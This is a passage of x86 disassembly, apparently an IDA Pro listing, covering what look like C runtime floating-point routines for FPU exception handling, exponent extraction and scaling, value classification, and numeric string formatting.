loc_41A300: ; CODE XREF: sub_41A160+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41A30B: ; CODE XREF: sub_41A160+19E�j
mov [eax], ecx
loc_41A30D: ; CODE XREF: sub_41A160+189�j
; sub_41A160+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_41A88E
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_4221A4 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41A387
and dword ptr [esi], 0FFFFFFFEh
loc_41A387: ; CODE XREF: sub_41A160+222�j
test byte ptr [eax+8], 8
jz short loc_41A390
and dword ptr [esi], 0FFFFFFFBh
loc_41A390: ; CODE XREF: sub_41A160+22B�j
test byte ptr [eax+8], 4
jz short loc_41A399
and dword ptr [esi], 0FFFFFFF7h
loc_41A399: ; CODE XREF: sub_41A160+234�j
test byte ptr [eax+8], 2
jz short loc_41A3A2
and dword ptr [esi], 0FFFFFFEFh
loc_41A3A2: ; CODE XREF: sub_41A160+23D�j
test [eax+8], bl
jz short loc_41A3AA
and dword ptr [esi], 0FFFFFFDFh
loc_41A3AA: ; CODE XREF: sub_41A160+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_41A3DE
dec ecx
jz short loc_41A3D2
dec ecx
jz short loc_41A3C8
dec ecx
jnz short loc_41A3E0
or byte ptr [esi+1], 0Ch
jmp short loc_41A3E0
; ---------------------------------------------------------------------------
loc_41A3C8: ; CODE XREF: sub_41A160+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_41A3DA
; ---------------------------------------------------------------------------
loc_41A3D2: ; CODE XREF: sub_41A160+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_41A3DA: ; CODE XREF: sub_41A160+270�j
mov [esi], ecx
jmp short loc_41A3E0
; ---------------------------------------------------------------------------
loc_41A3DE: ; CODE XREF: sub_41A160+257�j
and [esi], edx
loc_41A3E0: ; CODE XREF: sub_41A160+260�j
; sub_41A160+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_41A400
dec ecx
jz short loc_41A3F7
dec ecx
jnz short loc_41A409
and [esi], edx
jmp short loc_41A409
; ---------------------------------------------------------------------------
loc_41A3F7: ; CODE XREF: sub_41A160+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_41A407
; ---------------------------------------------------------------------------
loc_41A400: ; CODE XREF: sub_41A160+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_41A407: ; CODE XREF: sub_41A160+29E�j
mov [esi], ecx
loc_41A409: ; CODE XREF: sub_41A160+291�j
; sub_41A160+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41A160 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A413 proc near ; CODE XREF: sub_41A0C8+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_41A43E
test byte ptr [ebp+arg_8], bl
jz short loc_41A43E
push ebx
call sub_41A8C0
pop ecx
and edi, 0FFFFFFF7h
jmp loc_41A608
; ---------------------------------------------------------------------------
loc_41A43E: ; CODE XREF: sub_41A413+15�j
; sub_41A413+1A�j
test al, 4
jz short loc_41A458
test byte ptr [ebp+arg_8], 4
jz short loc_41A458
push 4
call sub_41A8C0
pop ecx
and edi, 0FFFFFFFBh
jmp loc_41A608
; ---------------------------------------------------------------------------
loc_41A458: ; CODE XREF: sub_41A413+2D�j
; sub_41A413+33�j
test al, bl
jz loc_41A532
test byte ptr [ebp+arg_8], 8
jz loc_41A532
push 8
call sub_41A8C0
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_41A50A
cmp ecx, 400h
jz short loc_41A4E2
cmp ecx, 800h
jz short loc_41A4BA
cmp ecx, eax
jnz loc_41A52A
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_422800
fld ds:dbl_431690
fnstsw ax
sahf
ja short loc_41A4B2
fchs
loc_41A4B2: ; CODE XREF: sub_41A413+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41A528
; ---------------------------------------------------------------------------
loc_41A4BA: ; CODE XREF: sub_41A413+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_422800
fnstsw ax
sahf
jbe short loc_41A4D2
fld ds:dbl_431680
jmp short loc_41A4DA
; ---------------------------------------------------------------------------
loc_41A4D2: ; CODE XREF: sub_41A413+B5�j
fld ds:dbl_431690
fchs
loc_41A4DA: ; CODE XREF: sub_41A413+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41A528
; ---------------------------------------------------------------------------
loc_41A4E2: ; CODE XREF: sub_41A413+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_422800
fnstsw ax
sahf
jbe short loc_41A4FA
fld ds:dbl_431690
jmp short loc_41A502
; ---------------------------------------------------------------------------
loc_41A4FA: ; CODE XREF: sub_41A413+DD�j
fld ds:dbl_431680
fchs
loc_41A502: ; CODE XREF: sub_41A413+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_41A528
; ---------------------------------------------------------------------------
loc_41A50A: ; CODE XREF: sub_41A413+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_422800
fld ds:dbl_431680
fnstsw ax
sahf
ja short loc_41A522
fchs
loc_41A522: ; CODE XREF: sub_41A413+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_41A528: ; CODE XREF: sub_41A413+A5�j
; sub_41A413+CD�j ...
fstp qword ptr [ecx]
loc_41A52A: ; CODE XREF: sub_41A413+81�j
and edi, 0FFFFFFFEh
jmp loc_41A608
; ---------------------------------------------------------------------------
loc_41A532: ; CODE XREF: sub_41A413+47�j
; sub_41A413+51�j
test al, 2
jz loc_41A608
test byte ptr [ebp+arg_8], 10h
jz loc_41A608
push esi
xor esi, esi
test al, 10h
jz short loc_41A54D
mov esi, ebx
loc_41A54D: ; CODE XREF: sub_41A413+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp ds:dbl_422800
fnstsw ax
sahf
jz loc_41A5F6
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_41A7BF
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_41A598
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_41A5EC
; ---------------------------------------------------------------------------
loc_41A598: ; CODE XREF: sub_41A413+17A�j
fld [ebp+var_C]
fcomp ds:dbl_422800
fnstsw ax
sahf
jnb short loc_41A5AA
mov edx, ebx
jmp short loc_41A5AC
; ---------------------------------------------------------------------------
loc_41A5AA: ; CODE XREF: sub_41A413+191�j
xor edx, edx
loc_41A5AC: ; CODE XREF: sub_41A413+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_41A5E0
sub eax, ecx
loc_41A5C3: ; CODE XREF: sub_41A413+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_41A5CE
test esi, esi
jnz short loc_41A5CE
mov esi, ebx
loc_41A5CE: ; CODE XREF: sub_41A413+1B3�j
; sub_41A413+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_41A5DA
or byte ptr [ebp+var_C+3], 80h
loc_41A5DA: ; CODE XREF: sub_41A413+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_41A5C3
loc_41A5E0: ; CODE XREF: sub_41A413+1AC�j
test edx, edx
jz short loc_41A5EC
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_41A5EC: ; CODE XREF: sub_41A413+183�j
; sub_41A413+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_41A5F8
; ---------------------------------------------------------------------------
loc_41A5F6: ; CODE XREF: sub_41A413+14E�j
mov esi, ebx
loc_41A5F8: ; CODE XREF: sub_41A413+1E1�j
test esi, esi
pop esi
jz short loc_41A605
push 10h
call sub_41A8C0
pop ecx
loc_41A605: ; CODE XREF: sub_41A413+1E8�j
and edi, 0FFFFFFFDh
loc_41A608: ; CODE XREF: sub_41A413+26�j
; sub_41A413+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_41A61F
test byte ptr [ebp+arg_8], 20h
jz short loc_41A61F
push 20h
call sub_41A8C0
pop ecx
and edi, 0FFFFFFEFh
loc_41A61F: ; CODE XREF: sub_41A413+1F9�j
; sub_41A413+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_41A413 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A62A(int,int,int,int,int,int,double,int)
sub_41A62A proc near ; CODE XREF: sub_41A075+2B�p
; sub_41A0C8+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_41A6D8
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_41A695
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_41A89D
lea eax, [ebp+var_20]
push eax
call sub_41E29F
add esp, 0Ch
test eax, eax
jnz short loc_41A68F
push esi
call sub_41A6B2
pop ecx
loc_41A68F: ; CODE XREF: sub_41A62A+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41A695: ; CODE XREF: sub_41A62A+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_41A89D
push [ebp+arg_0]
call sub_41A6B2
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_41A62A endp
; =============== S U B R O U T I N E =======================================
sub_41A6B2 proc near ; CODE XREF: sub_41A0C8+7D�p
; sub_41A62A+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_41A6CD
jle short locret_41A6D7
cmp eax, 3
jg short locret_41A6D7
mov ds:dword_4C9084, 22h
retn
; ---------------------------------------------------------------------------
loc_41A6CD: ; CODE XREF: sub_41A6B2+7�j
mov ds:dword_4C9084, 21h
locret_41A6D7: ; CODE XREF: sub_41A6B2+9�j
; sub_41A6B2+E�j
retn
sub_41A6B2 endp
; =============== S U B R O U T I N E =======================================
sub_41A6D8 proc near ; CODE XREF: sub_41A62A+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_4315A8
loc_41A6DF: ; CODE XREF: sub_41A6D8+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_41A6F5
add eax, 8
inc ecx
cmp eax, offset dbl_431680
jl short loc_41A6DF
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A6F5: ; CODE XREF: sub_41A6D8+D�j
mov eax, ds:off_4315AC[ecx*8]
retn
sub_41A6D8 endp
; =============== S U B R O U T I N E =======================================
sub_41A6FD proc near ; CODE XREF: sub_41A0C8+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_41A709
push 5
jmp short loc_41A71F
; ---------------------------------------------------------------------------
loc_41A709: ; CODE XREF: sub_41A6FD+6�j
test al, 8
jz short loc_41A711
push 1
jmp short loc_41A71F
; ---------------------------------------------------------------------------
loc_41A711: ; CODE XREF: sub_41A6FD+E�j
test al, 4
jz short loc_41A719
push 2
jmp short loc_41A71F
; ---------------------------------------------------------------------------
loc_41A719: ; CODE XREF: sub_41A6FD+16�j
test al, 1
jz short loc_41A721
push 3
loc_41A71F: ; CODE XREF: sub_41A6FD+A�j
; sub_41A6FD+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A721: ; CODE XREF: sub_41A6FD+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_41A6FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A72A(double)
sub_41A72A proc near ; CODE XREF: sub_415E4A:loc_415ED0�p
; sub_415F93:loc_416019�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_41A72A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A73C(double,int)
sub_41A73C proc near ; CODE XREF: sub_41A7BF+82�p
; sub_41A7BF+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_41A73C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A765 proc near ; CODE XREF: sub_415E4A+31�p
; sub_415F93+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_41A77C
cmp [ebp+arg_0], edx
jnz short loc_41A78E
push 1
jmp short loc_41A7B8
; ---------------------------------------------------------------------------
loc_41A77C: ; CODE XREF: sub_41A765+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41A78E
cmp [ebp+arg_0], edx
jnz short loc_41A78E
push 2
jmp short loc_41A7B8
; ---------------------------------------------------------------------------
loc_41A78E: ; CODE XREF: sub_41A765+11�j
; sub_41A765+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41A7A1
push 3
jmp short loc_41A7B8
; ---------------------------------------------------------------------------
loc_41A7A1: ; CODE XREF: sub_41A765+36�j
cmp cx, 7FF0h
jnz short loc_41A7BB
test [ebp+arg_4], 7FFFFh
jnz short loc_41A7B6
cmp [ebp+arg_0], edx
jz short loc_41A7BB
loc_41A7B6: ; CODE XREF: sub_41A765+4A�j
push 4
loc_41A7B8: ; CODE XREF: sub_41A765+15�j
; sub_41A765+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A7BB: ; CODE XREF: sub_41A765+41�j
; sub_41A765+4F�j
xor eax, eax
pop ebp
retn
sub_41A765 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A7BF(double,int)
sub_41A7BF proc near ; CODE XREF: sub_41A413+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_422800
push esi
fnstsw ax
sahf
jnz short loc_41A7DF
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_41A875
; ---------------------------------------------------------------------------
loc_41A7DF: ; CODE XREF: sub_41A7BF+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41A84E
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_41A7F7
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41A84E
loc_41A7F7: ; CODE XREF: sub_41A7BF+31�j
fld [ebp+arg_0]
fcomp ds:dbl_422800
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_41A80F
push 1
pop eax
jmp short loc_41A811
; ---------------------------------------------------------------------------
loc_41A80F: ; CODE XREF: sub_41A7BF+49�j
xor eax, eax
loc_41A811: ; CODE XREF: sub_41A7BF+4E�j
; sub_41A7BF+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_41A82A
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_41A824
or dword ptr [ebp+arg_0+4], 1
loc_41A824: ; CODE XREF: sub_41A7BF+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_41A811
; ---------------------------------------------------------------------------
loc_41A82A: ; CODE XREF: sub_41A7BF+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_41A838
or byte ptr [ebp+arg_0+7], 80h
loc_41A838: ; CODE XREF: sub_41A7BF+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41A73C
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_41A875
; ---------------------------------------------------------------------------
loc_41A84E: ; CODE XREF: sub_41A7BF+28�j
; sub_41A7BF+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41A73C
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_41A875: ; CODE XREF: sub_41A7BF+1B�j
; sub_41A7BF+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_41A7BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A880 proc near ; CODE XREF: sub_41A160+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_41A880 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A88E proc near ; CODE XREF: sub_41A160+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_41A88E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A89D proc near ; CODE XREF: sub_415E4A+13�p
; sub_415E4A+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41A89D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8C0 proc near ; CODE XREF: sub_41A413+1D�p
; sub_41A413+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_41A8D7
fld ds:tbyte_4316A8
fistp [ebp+arg_0]
wait
loc_41A8D7: ; CODE XREF: sub_41A8C0+B�j
test cl, 8
jz short loc_41A8EC
fstsw ax
fld ds:tbyte_4316A8
fstp [ebp+var_8]
wait
fstsw ax
loc_41A8EC: ; CODE XREF: sub_41A8C0+1A�j
test cl, 10h
jz short loc_41A8FB
fld ds:tbyte_4316B4
fstp [ebp+var_8]
wait
loc_41A8FB: ; CODE XREF: sub_41A8C0+2F�j
test cl, 4
jz short loc_41A909
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41A909: ; CODE XREF: sub_41A8C0+3E�j
test cl, 20h
jz short locret_41A914
fldpi
fstp [ebp+var_8]
wait
locret_41A914: ; CODE XREF: sub_41A8C0+4C�j
leave
retn
sub_41A8C0 endp
; =============== S U B R O U T I N E =======================================
sub_41A916 proc near ; CODE XREF: sub_415F19+F�p
push 30000h
push 10000h
call sub_41E2D7
pop ecx
pop ecx
retn
sub_41A916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A928 proc near ; CODE XREF: sub_41A966:loc_41A98A�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_422810
fstp [ebp+var_8]
fld ds:dbl_422808
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_422690
fnstsw ax
sahf
jbe short loc_41A962
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41A962: ; CODE XREF: sub_41A928+33�j
xor eax, eax
leave
retn
sub_41A928 endp
; =============== S U B R O U T I N E =======================================
sub_41A966 proc near ; CODE XREF: sub_415F19+5�p
push offset aKernel32 ; "KERNEL32"
call ds:off_4220E0
test eax, eax
jz short loc_41A98A
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:off_4220BC
test eax, eax
jz short loc_41A98A
push 0
call eax ; sub_415F19
retn
; ---------------------------------------------------------------------------
loc_41A98A: ; CODE XREF: sub_41A966+D�j
; sub_41A966+1D�j
jmp sub_41A928
sub_41A966 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A98F proc near ; CODE XREF: sub_417F58+3CB�p
; DATA XREF: sub_415F31+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_417221
cmp eax, 65h
pop ecx
jz short loc_41A9CF
loc_41A9A3: ; CODE XREF: sub_41A98F+3E�j
inc esi
cmp ds:dword_42F56C, 1
jle short loc_41A9BC
movsx eax, byte ptr [esi]
push 4
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_41A9CB
; ---------------------------------------------------------------------------
loc_41A9BC: ; CODE XREF: sub_41A98F+1C�j
movsx eax, byte ptr [esi]
mov ecx, ds:off_42F360
mov al, [ecx+eax*2]
and eax, 4
loc_41A9CB: ; CODE XREF: sub_41A98F+2B�j
test eax, eax
jnz short loc_41A9A3
loc_41A9CF: ; CODE XREF: sub_41A98F+12�j
mov cl, ds:byte_42F570
mov al, [esi]
mov [esi], cl
inc esi
loc_41A9DA: ; CODE XREF: sub_41A98F+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A9DA
pop esi
retn
sub_41A98F endp
; =============== S U B R O U T I N E =======================================
sub_41A9E9 proc near ; CODE XREF: sub_417F58+3E2�p
; DATA XREF: sub_415F31+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, ds:byte_42F570
mov cl, [eax]
test cl, cl
jz short loc_41AA05
loc_41A9F9: ; CODE XREF: sub_41A9E9+1A�j
cmp cl, dl
jz short loc_41AA05
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_41A9F9
loc_41AA05: ; CODE XREF: sub_41A9E9+E�j
; sub_41A9E9+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_41AA36
loc_41AA0C: ; CODE XREF: sub_41A9E9+34�j
mov cl, [eax]
test cl, cl
jz short loc_41AA1F
cmp cl, 65h
jz short loc_41AA1F
cmp cl, 45h
jz short loc_41AA1F
inc eax
jmp short loc_41AA0C
; ---------------------------------------------------------------------------
loc_41AA1F: ; CODE XREF: sub_41A9E9+27�j
; sub_41A9E9+2C�j ...
mov ecx, eax
loc_41AA21: ; CODE XREF: sub_41A9E9+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41AA21
cmp [eax], dl
jnz short loc_41AA2C
dec eax
loc_41AA2C: ; CODE XREF: sub_41A9E9+40�j
; sub_41A9E9+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_41AA2C
locret_41AA36: ; CODE XREF: sub_41A9E9+21�j
retn
sub_41A9E9 endp
; =============== S U B R O U T I N E =======================================
sub_41AA37 proc near ; DATA XREF: sub_415F31+28�o
; _2:off_4316D0�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_422800
fnstsw ax
sahf
jb short loc_41AA4C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41AA4C: ; CODE XREF: sub_41AA37+F�j
xor eax, eax
retn
sub_41AA37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA4F proc near ; CODE XREF: sub_41B7F5+430�p
; DATA XREF: sub_415F31+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41AA78
lea eax, [ebp+var_8]
push eax
call sub_41E79A
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41AA78: ; CODE XREF: sub_41AA4F+C�j
lea eax, [ebp+arg_8]
push eax
call sub_41E7C7
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_41AA4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA8D proc near ; CODE XREF: sub_41AD0A+17�p
; sub_41AD54+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:byte_4C90F4, 0
push ebx
push esi
jz short loc_41AAC2
mov ebx, [ebp+arg_8]
mov eax, ds:dword_4C90F0
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41ADA5
pop ecx
pop ecx
jmp short loc_41AAFA
; ---------------------------------------------------------------------------
loc_41AAC2: ; CODE XREF: sub_41AA8D+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_41E86B
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41E7F4
add esp, 14h
loc_41AAFA: ; CODE XREF: sub_41AA8D+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_41AB06
mov byte ptr [eax], 2Dh
inc eax
loc_41AB06: ; CODE XREF: sub_41AA8D+73�j
test ebx, ebx
jle short loc_41AB1E
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, ds:byte_42F570
mov eax, edi
pop edi
mov [eax], cl
loc_41AB1E: ; CODE XREF: sub_41AA8D+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp ds:byte_4C90F4, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_415B90
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41AB45
mov byte ptr [ecx], 45h
loc_41AB45: ; CODE XREF: sub_41AA8D+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41AB8A
mov ebx, [esi+4]
dec ebx
jns short loc_41AB59
neg ebx
mov byte ptr [ecx], 2Dh
loc_41AB59: ; CODE XREF: sub_41AA8D+C5�j
inc ecx
cmp ebx, 64h
jl short loc_41AB70
mov eax, ebx
